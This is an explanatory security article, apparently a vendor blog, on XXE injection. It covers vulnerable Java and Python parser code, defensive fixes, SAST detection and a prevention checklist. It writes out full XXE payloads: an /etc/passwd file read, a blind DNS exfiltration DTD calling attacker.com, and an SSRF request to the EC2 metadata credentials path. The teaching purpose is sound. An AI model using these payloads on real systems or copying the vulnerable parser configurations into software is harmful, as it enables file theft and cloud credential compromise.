What XXE Is
XML External Entity (XXE) injection is a vulnerability in applications that parse XML input. The XML specification includes a feature called "external entities": a way to reference content from an external source (a URL or local file path) and include it inline in the document. When an XML parser processes attacker-controlled XML and external entity processing is enabled, the attacker can use this feature to read local files, trigger server-side requests, and in some cases exfiltrate data out of band.
The vulnerability exists because external entity processing is often enabled by default in XML parsers rather than being a feature you have to opt into. Developers working with XML rarely think about it: they're focused on parsing the data, not on what the parser does with DOCTYPE declarations.
OWASP history: XXE was its own category (A04) in the OWASP Top 10 2017. In 2021 it was merged into Security Misconfiguration (A05), reflecting that XXE is fundamentally a case of an insecurely configured parser.
How XXE Attacks Work
XML documents can include a DOCTYPE declaration that defines entities, essentially named variables you can reference in the document body. External entities reference content from a URI:
<?xml version="1.0" encoding="UTF-8"?>
<!-- XXE payload: defines an external entity pointing to a local file -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
When an insecure parser processes this, it fetches the contents of /etc/passwd and substitutes it as the value of &xxe;. If the application echoes back the parsed value in the response, the attacker sees the file contents directly.
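To make the substitution mechanism concrete without touching a vulnerable parser, here is a minimal sketch using Python's standard-library xml.etree.ElementTree. It expands an internal entity (the same "named variable" mechanism) but refuses the external one. The helper name entity_text and the two sample documents are illustrative assumptions, not part of any real application.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text is defined inside the document itself.
INTERNAL = '<!DOCTYPE r [<!ENTITY greet "hello">]><r>&greet;</r>'
# External entity: the replacement text would come from a URI.
EXTERNAL = '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'


def entity_text(doc: str) -> str:
    """Return the root element's text, or a marker if the parser refuses the document."""
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as exc:
        # ElementTree does not fetch external entities; it reports a parse error instead.
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(entity_text(INTERNAL))
    print(entity_text(EXTERNAL))
```

A parser with external entities enabled would instead return the file contents for the second document, which is exactly the behaviour an attacker relies on.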
Classic File Read Attack
Here's what vulnerable parsing code looks like in Java and Python. The attacker sends it a payload like the file-read example above:
import java.io.InputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Class name is illustrative
public class XmlParser {
    // Vulnerable: the default DocumentBuilderFactory resolves external entities
    public Document parseXml(InputStream input) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Missing: feature flags to disable DOCTYPE declarations and external entities
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(input);
    }
}
from lxml import etree

# Vulnerable: resolve_entities=True expands external entities.
# (This was lxml's default before version 5.0; newer releases default to "internal".)
def parse_xml(xml_input: bytes):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_input, parser)

# Stdlib notes: xml.etree.ElementTree does not expand external entities, and
# xml.dom.minidom leaves them unexpanded. xml.sax resolved external general
# entities by default before Python 3.7.1, and still does when
# feature_external_ges is switched on.
import xml.sax
# xml.sax.parseString(attacker_xml, handler)  # vulnerable on Python < 3.7.1
We've seen this in SOAP services: Legacy Java SOAP endpoints are a hotspot for XXE. The WSDL-generated code often uses the default DocumentBuilderFactory, and nobody has updated it since the service was written in 2012. If your org has old Java web services, they're worth auditing first.
Blind XXE via DNS Exfiltration
Often the application doesn't echo back the parsed XML, but XXE can still be exploited using out-of-band techniques. The attacker references an external URI under their control and uses DNS lookups to exfiltrate data:
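<?xml version="1.0"?>
<!-- Blind XXE: pulls in an attacker-hosted DTD that exfiltrates data via a DNS lookup -->
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root><data>test</data></root>

<!-- Contents of evil.dtd (illustrative file name) on the attacker's server -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://%file;.attacker.com/'>">
%eval;
%exfil;

The entity definitions live in an external DTD because the XML specification forbids parameter-entity references inside declarations in the internal subset. The attacker watches their DNS server logs for incoming queries. The hostname value gets encoded into the subdomain of the request. No response body is needed from the app: the data arrives out of band.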
XXE to SSRF
Instead of using a file:// URL, the attacker can use http:// URLs to trigger server-side requests. This turns XXE into SSRF, with the server fetching attacker-specified internal URLs:
<!-- XXE as SSRF: scans internal network / hits metadata service -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
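On AWS instances that still allow IMDSv1, this hits the EC2 instance metadata service and returns the name of the IAM role attached to the instance; a second request with that role name appended to the path returns the role's temporary credentials. (IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot send.) Combined with verbose responses, this is a full cloud credential compromise.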
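As a rough illustration of why these SYSTEM URIs are dangerous, the sketch below classifies an entity target as sensitive when it uses the file scheme or points at a loopback, private, or link-local IP address. The function name is_sensitive_target is hypothetical, and the check is deliberately incomplete: hostnames are not resolved, so it should be read as a teaching aid and not as a filter to rely on.

```python
import ipaddress
from urllib.parse import urlparse


def is_sensitive_target(uri: str) -> bool:
    """Return True if an entity SYSTEM URI points at a local file or an internal IP."""
    parsed = urlparse(uri)
    if parsed.scheme == "file":
        return True  # local file read
    host = parsed.hostname
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: deciding would require resolution, which this sketch skips.
        return False
    # 169.254.169.254 (cloud metadata) is link-local; 10.x and 192.168.x are private.
    return addr.is_loopback or addr.is_private or addr.is_link_local


if __name__ == "__main__":
    for target in (
        "file:///etc/passwd",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://8.8.8.8/",
    ):
        print(target, is_sensitive_target(target))
```

Disabling external entities in the parser remains the actual fix; a classifier like this is mainly useful for reviewing logs or test payloads.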
Which Languages and Parsers Are Vulnerable
External entity processing is a parser-level feature, so the vulnerability depends on which parser you use and how it's configured:
- Java: DocumentBuilderFactory, SAXParserFactory, XMLInputFactory: all enable external entities by default
- Python: xml.sax resolved external entities by default before Python 3.7.1; lxml did so before version 5.0 and still does with resolve_entities=True; xml.etree.ElementTree and xml.dom.minidom do not expand external entities
- PHP: simplexml_load_string(), DOMDocument: vulnerable by default in older PHP versions
- Node.js: libxmljs with noent: true is vulnerable; most Node XML parsers are safer by default
- .NET: XmlDocument and XmlTextReader: vulnerable in some configurations prior to .NET Framework 4.5.2
SVG uploads are an XXE vector: SVG files are XML. If your app accepts SVG uploads and parses them server-side (for preview generation, sanitisation, etc.) without disabling external entities, it's vulnerable to XXE from uploaded files. This catches a lot of teams off guard.
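One way to screen uploads, sketched here with Python's standard-library expat bindings, is to reject any document that carries a DOCTYPE declaration before it reaches the real SVG processing code. The names DoctypeForbidden and ensure_no_doctype are hypothetical, and this assumes your SVG handling never needs a DTD.

```python
import xml.parsers.expat as expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded document contains a DOCTYPE declaration."""


def ensure_no_doctype(data: bytes) -> None:
    """Parse data once and raise DoctypeForbidden if it declares a DOCTYPE."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires as soon as the DOCTYPE starts, before any entity is used.
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed in uploads")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # malformed XML raises expat.ExpatError


if __name__ == "__main__":
    safe_svg = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="1"/></svg>'
    evil_svg = (
        b'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<svg>&xxe;</svg>"
    )
    ensure_no_doctype(safe_svg)
    try:
        ensure_no_doctype(evil_svg)
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

This is a pre-check, not a sanitiser: the parser that later processes the SVG should still be hardened.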
How to Disable External Entity Processing
// Fixed Java: disable all external entity features
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(input);

from lxml import etree
from defusedxml import ElementTree

# Option 1: Use defusedxml, a drop-in safe replacement for stdlib XML
tree = ElementTree.fromstring(xml_input)

# Option 2: lxml with safe parser config
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
)
root = etree.fromstring(xml_input, parser)
defusedxml for Python: The defusedxml library wraps Python's XML parsers and blocks the well-known XML attack vectors by default (XXE, billion laughs, quadratic blowup). It's a drop-in replacement for xml.etree.ElementTree, xml.sax, etc. Just install and swap the import.
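If adding a dependency is not an option, the standard-library SAX parser can be hardened explicitly. The sketch below is one possible setup, not the only one: it switches off external general and parameter entities with the documented xml.sax.handler feature constants. TextCollector and parse_hardened are illustrative names.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_hardened(data: bytes) -> str:
    """Parse XML with external entities switched off and return its text content."""
    parser = xml.sax.make_parser()
    # Explicit even on Python >= 3.7.1, where external general entities are off by default.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.chunks)


if __name__ == "__main__":
    payload = (
        b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<r>ok&xxe;</r>"
    )
    print(parse_hardened(payload))  # the external entity is skipped, not fetched
```

Note that this only addresses external entities; internal entity expansion attacks such as billion laughs still need defusedxml or a DOCTYPE ban.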
Detecting XXE with SAST
XXE is a good candidate for SAST because the vulnerability is about parser configuration: detectable code patterns rather than runtime behaviour. SAST tools look for:
- Use of DocumentBuilderFactory, SAXParserFactory, or XMLInputFactory without the hardening feature flags
- xml.sax.parseString() or xml.dom.minidom.parseString() calls on untrusted input without defusedxml
- PHP's simplexml_load_string() or DOMDocument->loadXML() called with the LIBXML_NOENT flag, which turns entity substitution on
- SVG or document upload handling that routes to XML parsing without validation
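The pattern-matching idea can be sketched in a few lines with Python's ast module. This toy check flags two Python patterns only (XMLParser called with resolve_entities=True, and setFeature enabling feature_external_ges). It is an assumption-laden illustration of the approach, not a description of how any particular SAST product works, and find_risky_xml_calls is a made-up name.

```python
import ast


def find_risky_xml_calls(source: str) -> list:
    """Return sorted (line, message) pairs for risky XML parser setup in source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Handle both `XMLParser(...)` and `etree.XMLParser(...)`.
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name == "XMLParser":
            for kw in node.keywords:
                if (kw.arg == "resolve_entities"
                        and isinstance(kw.value, ast.Constant)
                        and kw.value.value is True):
                    findings.append((node.lineno, "XMLParser(resolve_entities=True)"))
        elif name == "setFeature" and len(node.args) == 2:
            feature, state = node.args
            feature_name = (feature.attr if isinstance(feature, ast.Attribute)
                            else getattr(feature, "id", ""))
            if (feature_name == "feature_external_ges"
                    and isinstance(state, ast.Constant)
                    and state.value is True):
                findings.append((node.lineno, "setFeature(feature_external_ges, True)"))
    return sorted(findings)


if __name__ == "__main__":
    sample = (
        "from lxml import etree\n"
        "bad = etree.XMLParser(resolve_entities=True)\n"
        "ok = etree.XMLParser(resolve_entities=False)\n"
    )
    for line, message in find_risky_xml_calls(sample):
        print(f"line {line}: {message}")
```

Real tools add data-flow analysis on top of this, for example to tell whether the parsed input is attacker-controlled.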
Prevention Checklist
- Disable DOCTYPE declarations entirely: if your XML doesn't use DTDs, block them at the parser level
- Disable external general and parameter entities: use the feature flags for your language's parser
- Use defusedxml in Python: it handles all the edge cases
- Use simpler data formats: if JSON works for your use case, use JSON; it doesn't have this class of problem
- Treat SVG uploads as XML: parse them with a hardened parser or sanitise server-side
- Run SAST in CI: catch unsafe parser instantiation before code ships
- Network-level controls as defence in depth: block outbound HTTP/DNS from app servers where possible to limit out-of-band exfiltration
Find XXE Vulnerabilities in Your Codebase
AquilaX SAST detects insecure XML parser configurations across Java, Python, PHP, and Node.js, catching XXE before it ships to production.